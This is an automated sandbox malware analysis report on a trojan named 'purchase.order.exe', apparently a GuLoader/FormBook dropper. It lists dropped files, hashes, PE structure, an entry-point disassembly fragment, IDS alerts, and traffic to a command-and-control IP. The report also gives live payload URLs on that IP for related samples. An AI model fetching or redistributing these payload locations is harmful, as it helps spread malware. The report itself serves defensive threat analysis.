https://contoso.com/ | powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000002.00000002.2659979907.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ftp.ftp://ftp.gopher. | Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | purchase.order.exe, 00000000.00000000.1421338279.000000000040A000.00000008.00000001.01000000.00000003.sdmp, purchase.order.exe, 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Fathoming.exe, 00000008.00000000.2633837075.000000000040A000.00000008.00000001.01000000.00000007.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
212.162.149.66 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1572377
                                        Start date and time:2024-12-10 14:06:24 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:purchase.order.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@6/13@0/1
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 80
                                        • Number of non-executed functions: 298
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Stop behavior analysis, all processes terminated
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: purchase.order.exe
Time | Type | Description
08:07:37 | API Interceptor | 36x Sleep call for process: powershell.exe modified
08:10:10 | API Interceptor | 3x Sleep call for process: Fathoming.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
212.162.149.66 | Forhandlingsfriheden.exe | malicious | FormBook, GuLoader | 212.162.149.66/KtFSlX90.bin
212.162.149.66 | purchase order.exe | malicious | FormBook, GuLoader | 212.162.149.66/NmxYyszZoKwuD57.bin
                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNREAL-SERVERSUS | Forhandlingsfriheden.exe | malicious | FormBook, GuLoader | 212.162.149.66
UNREAL-SERVERSUS | order CF08093-24.exe | malicious | Remcos, GuLoader | 212.162.149.89
UNREAL-SERVERSUS | PO. A-72 9234567.exe | malicious | FormBook, GuLoader | 212.162.149.89
UNREAL-SERVERSUS | la.bot.arm7.elf | malicious | Mirai | 162.251.123.175
UNREAL-SERVERSUS | file.exe | malicious | RedLine | 212.162.149.48
UNREAL-SERVERSUS | https://haqzt.trc20.kcgrocks.com/merchantServices | malicious | Unknown | 172.96.10.214
UNREAL-SERVERSUS | scan_241205-801_draft_PO.exe | malicious | Remcos, GuLoader | 162.251.122.87
UNREAL-SERVERSUS | 1g4lfpPUqt.exe | malicious | GuLoader | 212.162.149.63
UNREAL-SERVERSUS | purchase order.exe | malicious | FormBook, GuLoader | 212.162.149.66
UNREAL-SERVERSUS | Juleferien.exe | malicious | FormBook | 212.162.149.128
                                        No context
                                        No context
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):53158
                                        Entropy (8bit):5.062687652912555
                                        Encrypted:false
                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                        MD5:5D430F1344CE89737902AEC47C61C930
                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (4399), with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):74268
                                        Entropy (8bit):5.138743165931201
                                        Encrypted:false
                                        SSDEEP:1536:8WcWpxebXy7DSehWrnBS4nC6jf6Lk6a71gMTGV795NvkC:8WzxCXN7BS4nBfwpa71fyVZ5x7
                                        MD5:CC4ED67CA05BD1F1D1A8C381E9356E3B
                                        SHA1:1D7B6BBCA940F66793B6F17F0C51B81DB03F05C0
                                        SHA-256:16529792E18438E8367854B1802F2E0F48AE4A063C3EF4843367BF4378657CCC
                                        SHA-512:9641C40595877464E051D73C075FA0D2CDAEFC10C217B54819483D5618E95EA8E04F9827EF48009C6231DD28DD4626BB2CEFD3B06F8AF3BF0FDBABE15F4FCB83
                                        Malicious:true
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):493903
                                        Entropy (8bit):1.2514017425028907
                                        Encrypted:false
                                        SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                        MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                        SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                        SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                        SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):340924
                                        Entropy (8bit):1.2553271369192232
                                        Encrypted:false
                                        SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                        MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                        SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                        SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                        SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):437071
                                        Entropy (8bit):1.253825384833456
                                        Encrypted:false
                                        SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                        MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                        SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                        SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                        SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):484281
                                        Entropy (8bit):1.2585657408825282
                                        Encrypted:false
                                        SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                        MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                        SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                        SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                        SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                        Malicious:false
                                        Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):336637
                                        Entropy (8bit):7.5896119516662095
                                        Encrypted:false
                                        SSDEEP:6144:DTeuTRHWWOGm79imNXScadM9DhDc1o26M+iYAj0wTEzOMi7z337CXFV55OVoY:DSuTRHWWOGm79imNXbadM9DhDQoHBwg0
                                        MD5:ABAAC81329EECF81FF3C657032374407
                                        SHA1:F1A1A80646B32A2B13609055CF2A4C70A2AC39A1
                                        SHA-256:6CFCEDF277B5B94AED858D15D4D47155F586CFAA5C8237019ED4A2E41A7801A8
                                        SHA-512:B92D75DF310393DE3B346B24B7FFE5B825FBA32B78F03C10D1811BC67E6DCE4AF4E06C15BFDF02C4E810195549EAAEF2D1F5CF6A272C7199C7E67ACA1102055A
                                        Malicious:false
                                        Preview:.[[....NNN..................A...G.....ee...^......0.....................ZZ............++....`.......................................VVVVVVV.....88......................<<.#.. ...8....qq.aaa..RRRRR.........FF.^.....'...........ii....d....................................5.\..........7.J. .................FFFFFF.....O..............:.N.#..g.........................-....................................DD.........................yy...o..........;;..AAAAA......^.......zzz..................................#....,................nn...............5......JJ..................................7..`...../..22.......M...&&&..............-..I............II....._.......`.QQQQ...........*.....nn................~~~..........eee..........................p...........E.............-..............................P......3......!............777....P............RR.....................d...............L...........4.....M.................................v.....XX....i..<<.(..........................................4
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):801068
                                        Entropy (8bit):7.827752052976843
                                        Encrypted:false
                                        SSDEEP:12288:UXqlVfD6qC0llhpgdtaQmxjBrmu+U1tczmuV4PRklT3we+doWVkeehow:UXqzrTcq9xmu+TzmW4QT31V1how
                                        MD5:8125E510DF447B0EAD0E263D006A253E
                                        SHA1:D1C5A46902E50A785D7BE8822B5E80E262CF640D
                                        SHA-256:91E694F4AD9556406DB3D63BE6B1917EDBD509118A83A9D920FC758F0B8D0A54
                                        SHA-512:9CB68F4C15BE93641D90CADA462FB4626941274462A577E76049A09F7CEE797767287B973F1A63A7BE89878A9E9C4B98975A32EEDEDA620BAAF681621ABD9B4A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 18%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.827752052976843
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:purchase.order.exe
                                        File size:801'068 bytes
                                        MD5:8125e510df447b0ead0e263d006a253e
                                        SHA1:d1c5a46902e50a785d7be8822b5e80e262cf640d
                                        SHA256:91e694f4ad9556406db3d63be6b1917edbd509118a83a9d920fc758f0b8d0a54
                                        SHA512:9cb68f4c15be93641d90cada462fb4626941274462a577e76049a09f7cee797767287b973f1a63a7be89878a9e9c4b98975a32eededa620baaf681621abd9b4a
                                        SSDEEP:12288:UXqlVfD6qC0llhpgdtaQmxjBrmu+U1tczmuV4PRklT3we+doWVkeehow:UXqzrTcq9xmu+TzmW4QT31V1how
                                        TLSH:0F05029179A0163FC16D413B71672E71EBAB9FA813776402A223FF4B71357627E08682
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....
                                        Icon Hash:71868ed4e8b04d49
                                        Entrypoint:0x40351c
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                        Instruction
                                        sub esp, 000003F8h
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebp, ebp
                                        push 00008001h
                                        mov dword ptr [esp+20h], ebp
                                        mov dword ptr [esp+18h], 0040A2D8h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [004080A4h]
                                        mov esi, dword ptr [004080A8h]
                                        lea eax, dword ptr [esp+34h]
                                        push eax
                                        mov dword ptr [esp+4Ch], ebp
                                        mov dword ptr [esp+0000014Ch], ebp
                                        mov dword ptr [esp+00000150h], ebp
                                        mov dword ptr [esp+38h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007FEA4CBA9D7Ah
                                        lea eax, dword ptr [esp+34h]
                                        mov dword ptr [esp+34h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [esp+48h]
                                        mov ecx, dword ptr [esp+62h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [esp+0000014Eh], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [esp+00000148h], ax
                                        cmp dword ptr [esp+38h], 0Ah
                                        jnc 00007FEA4CBA9D48h
                                        and word ptr [esp+42h], 0000h
                                        mov eax, dword ptr [esp+40h]
                                        movzx ecx, byte ptr [esp+3Ch]
                                        mov dword ptr [00429AD8h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [esp+38h]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [esp+00000148h]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx
                                        movzx ecx, byte ptr [esp+0000004Eh]
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
                                         Name | Virtual Address | Virtual Size | Is in Section
                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x1f780 | .rsrc
                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                         .text | 0x1000 | 0x6576 | 0x6600 | 1e4066ed6e7440cc449c401dfd9ca64f | False | 0.6663219975490197 | data | 6.461246686118911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                         .rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         .data | 0xa000 | 0x1fb38 | 0x600 | 2e1d49b2855a89e6218e118f0c182b81 | False | 0.5026041666666666 | data | 4.044293204800279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         .ndata | 0x2a000 | 0x23000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                         .rsrc | 0x4d000 | 0x1f780 | 0x1f800 | 8e8a3197e2686a2d1e03890bd5970dad | False | 0.5309554811507936 | data | 6.149455977169068 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                         RT_ICON | 0x4d2f8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.25881343901573406
                                         RT_ICON | 0x5db20 | 0x9f42 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9983811626195732
                                         RT_ICON | 0x67a68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.4413900414937759
                                         RT_ICON | 0x6a010 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5112570356472795
                                         RT_ICON | 0x6b0b8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.6077868852459016
                                         RT_ICON | 0x6ba40 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.650709219858156
                                         RT_DIALOG | 0x6bea8 | 0x100 | data | English | United States | 0.5234375
                                         RT_DIALOG | 0x6bfa8 | 0x11c | data | English | United States | 0.6056338028169014
                                         RT_DIALOG | 0x6c0c8 | 0xc4 | data | English | United States | 0.5918367346938775
                                         RT_DIALOG | 0x6c190 | 0x60 | data | English | United States | 0.7291666666666666
                                         RT_GROUP_ICON | 0x6c1f0 | 0x5a | data | English | United States | 0.7888888888888889
                                         RT_VERSION | 0x6c250 | 0x1f0 | MS Windows COFF PowerPC object file | English | United States | 0.5504032258064516
                                         RT_MANIFEST | 0x6c440 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                         DLL | Import
                                         ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                         SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                         ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                         COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                         USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                         GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                         KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                         Language of compilation system | Country where language is spoken | Map
                                         English | United States |
                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                         2024-12-10T14:09:52.971466+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49707 | 212.162.149.66 | 80 | TCP
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Dec 10, 2024 14:09:51.546360016 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
                                         Dec 10, 2024 14:09:51.671773911 CET | 80 | 49707 | 212.162.149.66 | 192.168.2.10
                                         Dec 10, 2024 14:09:51.672040939 CET | 49707 | 80 | 192.168.2.10 | 212.162.149.66
